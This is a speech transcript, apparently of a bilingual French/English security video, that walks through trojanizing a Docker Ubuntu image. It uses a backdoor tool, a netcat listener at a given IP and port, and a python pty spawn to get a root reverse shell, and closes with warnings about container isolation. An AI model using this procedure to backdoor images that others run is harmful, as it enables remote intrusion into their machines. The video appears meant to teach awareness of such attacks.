Alors les amis, je vous ai montré un petit peu comment on faisait de l'analyse forensique très très simple, hein. Mais vous voyez que on a trouvé notre porte dérobée, hein. Visiblement, il y avait un compte qui avait été ajouté et qui permettait un accès direct sur la machine. Maintenant, on va faire l'opération inverse. On va se mettre dans la peau d'un attaquant et je vais vous parler, tout simplement, je vais vous montrer comment installer une porte dérobée dans une image, un container Docker. Ok? Vous savez que dans le monde de l'informatique, de la sécurité, une porte dérobée, c'est quoi? Ça fait référence en fait à un accès, hein, qui est souvent secret et qui permet à un administrateur d'accéder à un système à distance en fait, hein, en contournant les protocoles d'identification normaux. Alors qu'un utilisateur légitime, en fait, hein, peut installer tout à fait une porte dérobée sur des services logiciels, sur la couche applicative, à des fins de maintenance ou de dépannage, hein. Et très souvent, qu'est-ce que vont faire les hackers? Ils vont essayer de récupérer cette fameuse porte dérobée secrète qu'utilisent tous les fabricants en informatique, hein. On va dire comme ça, parce que vous savez que c'est extrêmement large, hein. C'est-à-dire que ça peut être une porte secrète physique, hein, une physique backdoor, ou ça peut être dans la partie applicative, la partie logicielle. Le but des attaquants, ça va être d'en tirer parti, voire d'installer leur propre porte dérobée à des fins malveillantes. Donc il est très courant de voir des personnes télécharger des applications, des logiciels, hein, qui sont accessibles au grand public, qui peuvent être malheureusement, hein, malveillantes. Ok? Si l'application installe une porte dérobée sur votre système, un attaquant peut accéder à distance au système de fichiers ou même exécuter des commandes sur votre système d'exploitation, hein, votre hôte. Ok? Et avec une augmentation au niveau de la demande de Docker, hein, au niveau du DevOps, ok, il y a de plus en plus d'applications et de services qui sont conteneurisés, hein, qui sont compartimentés et hébergés sur des registres publics. On a Docker Hub où vous pouvez aller télécharger un paquet d'images Docker. Ok. Par conséquent, il faut être très prudent lors de l'installation d'images Docker sur votre machine, hein. Ok, parce qu'elle pourrait servir à une action malicieuse, à une intention malveillante. Ok. Euh, Qu'est-ce que je disais? Il y a une des personnes de la commu qui m'a dit, mais pourquoi tu fais pas de Vuln Hub? Et je lui ai répondu, bah écoute, tu sais que tu peux télécharger une image, une VM, et la VM va venir te pirater, t'attaquer. C'est tout à fait possible en fait. Tout va dépendre de la configuration, de l'architecture de ton système, et surtout, est-ce que tu as mis des, des protections pour empêcher une action, une intention malveillante. Ok? So basically, in the world of IT security, a backdoor refers to often secret portal that lets admin access system remotely bypassing the normal authentication protocol, while a legitimate user can install a secret backdoor on software services for maintenance or troubleshooting. Attackers can leverage this or even install their own backdoor for malicious intent. It is a very common trick, huh, to see people downloading publicly available apps or software which may be malicious. If the app happens to install a backdoor on your system, an attacker can remotely access the file system or even execute command on the host operating system. With a rise in demand for Docker in the DevOps world, more and more applications and services are being containerized and hosted on a public registries like Docker Hub. Hence, on must be various caution while installing Docker images on their machine, as they too could be served as
a malicious intent. Okay? So I will show you how to install a backdoor on an existing Docker image. So basically infect it and how we can gain remote access on a target machine. For this, we will use Docker scan. Okay? We shall use a basic Ubuntu image and infect it. When the infected image is running, we shall see we can get a reverse shell from the target machine. Okay? So, to begin with, we have to install Python, Git and Docker. Then, I will show you the trick. Ok? Donc, typiquement, qu'est-ce qui se passe? Qu'est-ce qu'on va faire dans cette vidéo? Je vais vous montrer comment on peut installer une porte dérobée sur une image Docker existante. On va l'infecter. Comment nous pouvons obtenir un accès à distance, en fait, sur la machine de la cible, pardon. Excusez-moi. Pour cela, on va utiliser Docker Scan. On va utiliser une image Ubuntu et on va l'infecter comme je vous le disais. Lorsque cette image est infectée et qu'elle va être exécutée, en cours d'exécution, on va voir tout simplement qu'on peut venir obtenir un reverse shell, un shell inversé à partir de la machine cible. Hein, ok? Donc on va se servir de quoi? Rien de bien compliqué. Hein? Nothing fancy, comme on dit en anglais. On va utiliser Python, version 3.6 ou plus, Git et Docker. Et je vais vous montrer comment on peut infecter une image. Ok. Donc là, il a téléchargé l'image d'internet. Ok. We have pulled up the latest Ubuntu image. Now, let's save it. Donc maintenant, on va la sauvegarder. Docker pull, on fait un Docker save. Ok. Et je le dis Ubuntu latest, la dernière. Ok. Et je vais lui dire output file. Ok. Et je vais dire Ubuntu, on va l'appeler decoy. Ok, le leur. Comment ça, reference does not exist, motherfucker? Ubuntu. Comment ça, save Ubuntu latest, maybe. Okay. So, now for Docker scan to work, we need to export the following environment variables. Ok, pour que Docker scan puisse fonctionner, on va exporter ces variables d'environnement. Ok, si vous faites pas ça, ça va être le bordel au niveau de l'encodage. Vous savez que l'encodage le plus utilisé, hein, the most used coding is UTF-8. Ok, on va utiliser l'UTF-8. Donc je vais lui dire quoi? Je vais lui dire export. Donc je vais lui dire quoi? Je vais lui dire export. On va zoomer un peu, que vous voyez. Ok. Donc on va faire quoi? Export. LC. All. Equal. Égal. C. Point. UTF-8. Ok. Ça c'est l'encodage. Ok. Donc qu'est-ce que je peux faire? Je peux faire un cat LC all. Ensuite, on va faire quoi? On va faire un export. Après LCL, on utilise lang comme language. Ok? Égal. Qu'est-ce qu'on a dit? C.utf 8. Attention à la casse. C'est sensible. Ok? Donc on a fait un export lang C
UTF-8 et on a fait un LC all C.UTF-8. Ok, parfait. Donc maintenant, pour que Docker Scan puisse fonctionner, on va copier l'image de base d'Ubuntu, ok, et on va lui introduire une porte dérobée. Et on va exécuter la commande suivante, ok. So, basically, to the Docker Scan working, we need a copy to the Ubuntu base image and we shall set up the backdoor. I will use this following command. Ok. Alors, UFW status, on va vérifier le parfait. We will check the firewall. The Metasploit port is open. Ok. On voit que j'ai déjà ouvert le 444. On va utiliser le 444 pour cet exemple. Vous utilisez ce que vous voulez, bien sûr. Ok. Donc, donc là, c'est le Docker. Hein? This is the Docker IP address. I don't care. I want mine. Je veux la mienne. Donc, ça sera le 192.168.1.15. OK? Donc, Docker scan, image, modify. OK? I want to modify the image. Je veux modifier l'image. Je lui mets quoi en paramètre? I will use the Trionize switch. OK? Trionize. OK? To backdoor the image. On va backdoorer l'image. Ubuntu. Hein? Decoy. L. My IP. Mon adresse IP. OK? NP. Tag. Donc on va utiliser quoi? Le switch, bah, port 444. OK? And output. OK? Output file, Ubuntu. Choose the nice. OK? Donc, Ubuntu qui a été backdooré. OK? So, to receive the rival shell on it, OK? We got our listener, netcat listener. On a notre netcat listener et on voit que ça fonctionne. So, let's break this command and try to understand it. Huh? Basically saying, hey Docker scan, I am going to use this image, Ubuntu decoy, I need you to modify it by Trojanizing it, backdooring it, save the infected file as Ubuntu Trojanized. Once someone create a container from Ubuntu Trojanized, I shall be listening for response on the given IP address and port. Basta. Ok? Donc techniquement, si je dois résumer qu'est-ce qu'on a fait, on lui a dit, hey Docker scan, on va utiliser cette image, Ubuntu decoy, et j'ai besoin que tu me la modifies, que tu me la militarises via un troyen, une porte dérobée. Tu vas sauvegarder l'image en tant qu'Ubuntu qui a été trojanisé. Hein, ça se dit pas, c'est un anglicisme, mais vous avez compris. Et bah, à partir de ce moment-là, en fait, n'importe qui va télécharger mon image d'Ubuntu trojanisé, eh ben, qu'est-ce qui va se passer? Je vais récupérer un reverse shell à partir de l'adresse IP 192.168.1.15 sur le port 444. Ok? C'est très simple, hein. Rien de bien compliqué, hein. L'informatique, c'est pas compliqué. Donc on continue plus sérieusement. Maintenant, qu'est-ce qu'il faut? Ok? Il faut l'adresse IP du Docker. Ok? We need the Docker IP. IP address, if config as you want. Ok? The Docker, this one. Ok? Donc là, on a l'adresse du Docker. We got it. So now
we will run this command, ok? Grosso modo, qu'est-ce que je suis en train de faire avec Docker Scan? Je suis en train de lier ma propre adresse IP, mon Kali Linux, avec le port 444 Metasploit. C'est là que je vais faire tourner mon listener NAT4 et je la lie également à l'adresse IP de la machine. Ok, là c'est 172.17.0.1 et je vais lui donner un port. Ok, on peut utiliser ce que vous voulez. Là, on va prendre 80-81 ou 80-81, c'est utilisé par Burp Suite. On va utiliser 80-81, ok? Et on va voir comment ça fonctionne. So basically, what we have done with Docker Scan, I have linked my own IP address with a port. I use the Metasploit port, aka 44444 and 4444, and now I will link the IP address of the Docker container, and I will choose a random port. We can use maybe 8081, okay, for this example. So Docker scan, image, modify, okay. What we choose? We choose Tronize. Okay, I will clear. Je vais nettoyer tout ça. Okay. Nouvelle commande. Okay. So what we said, call it decoy. Now I will put the Docker IP, not mine. Donc 172.17.0.1. OK. Et on va prendre un autre port. We will choose another port. OK. And we call it Ubuntu Trojanize. OK. So it will run successfully. As we can see, the following output is depending on the IP address and the port. Okay. Reading the output, we will see Docker scan give you the command, okay, to execute and to receive a reverse shell, to grab the reverse shell from the target machine. Ok, donc encore une fois, comme on a rentré notre propre adresse IP, il nous dit, bah voilà, la commande hein, pour récupérer le reverse shell. Là, c'est pareil, on lui met l'adresse IP du Docker. C'est comme ça que tu récupéreras le reverse shell. Ok? Ok? Tarfile, Ubuntu decoy. So now let's use the payload. Ok? Donc on va utiliser la commande. Ok? Je vais ouvrir un listener, un auditeur net4, ok, avec les options VKLN sur le port 8081 qu'on a spécifié avec l'adresse IP du Docker. So basically, I am using the payload, ok. It is a net4 listener VKLN
IP address of the Docker and the port we have chosen. OK? Listening on. OK? Donc il écoute. OK. So it is downloading. OK? And loading our image, malicious image. Now we have to run it. On va l'exécuter. IT, IT, je veux quoi? Ubuntu. Classique. Ubuntu latest? Yes. Vas-y, télécharge la dernière image. Elle est au top. OK? So I am running the image. Let's go back to our Netcat listener running. Huh? Okay. Connecting people. You are connecting people. LS. We are in. Okay? We are fucking in. Python. Import. Import. PTY. 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 Spawn. Bean bash. Not fun? Okay. We are in. Who am I? Root. Okay? It's not my machine. We are inside the container thanks to the backdoor. On est à l'intérieur de ce putain de container grâce à notre porte dérobée. Là, si je fais home, je suis pas saltimbanque. Je suis quoi? Y a rien. Vous voulez que je vous montre mon home? Ok? Ça, c'est mon home. Voilà. Vous voyez une différence. Ok? Donc voilà. Comment installer une porte dérobée et ça marche du feu de Dieu. So, I will thank you. Merci de votre écoute, hein, comme d'habitude. La communauté s'agrandit de jour en jour. On sera bientôt 200. Ça me fait chaud au cœur. I'm so glad the community is growing up. Thank you all. And voilà, hein, les portes dérobées. En informatique, c'est quoi? Eh ben, c'est des méthodes pour accéder à un système, ok? Ça peut être des portes dérobées matérielles, ça peut être des portes dérobées logicielles, ça peut être des portes dérobées également dans un conteneur. Ne croyez pas parce que vous utilisez Docker que vous êtes à l'abri de toutes les techniques de fils de puterie qu'on peut utiliser dans l'informatique offensive. On n'est pas dans un monde de bisounours. Ok? Et très souvent, qu'est-ce que vont faire les attaquants? Ils vont accéder, hein, à une machine en se servant des mounts. Ok? On va monter des volumes et on va charger des images. Et bah, une image Docker, si vous la chargez, elle va venir poutrer votre machine, ni plus ni moins. Ok? Et c'est quoi quand on monte un volume? Eh ben, grosso modo, c'est une arborescence, hein. C'est une file directory dans un conteneur qui est directement partagé avec votre hôte. Donc, que ça soit une VM ou un conteneur, elle pourra vous attaquer, elle pourra vous poutrer. Arrêtez de... Parce qu'on vous a dit compartimentation, que c'est compartimenté, ça allait pas marcher. C'est faux. Ok? Donc, soyez pas naïfs. Comprenez comment ça fonctionne, et là vous voyez qu'en quelques minutes, on a niqué le système, ok? Et on peut accéder bah, au volume qui a été monté, comme j'accéderai à votre propre machine. Et c'est pas parce qu'il y a de la compartimentation que ça vous sauvera, ok? So don't be fool, don't be foolish, ok? Basically, backdoor are just one of the few methods out there to get access to a container, to get access to a physical backdoor, to get access to a logical backdoor. But why would you anyone want to access to the container? Often attackers want to get access to the underlying host machine through volume mount, okay? A volume mount is a file directory on the container which is directly shared by the host machine. So, getting access to a volume mount would mean getting access to a host machine. Okay?
This is simple as that. Don't be foolish, okay? Containers are not secure at all, okay? See you soon. Wish you enjoy the video. Take care. J'espère que vous avez kiffé. Je vous dis à très bientôt. Prenez soin de vous. Les cours LFI, RFI, CRSF, ça arrive. Je termine mon barbecue et je vous fais ça quand j'ai le temps. Cet après-midi, ce soir, cette nuit, je sais pas trop. Pour celui qui me l'a demandé sur Discord. Je vous dis à bientôt les amis. See you soon my friends. Love you. Je vous aime. À très bientôt. Ciao ciao.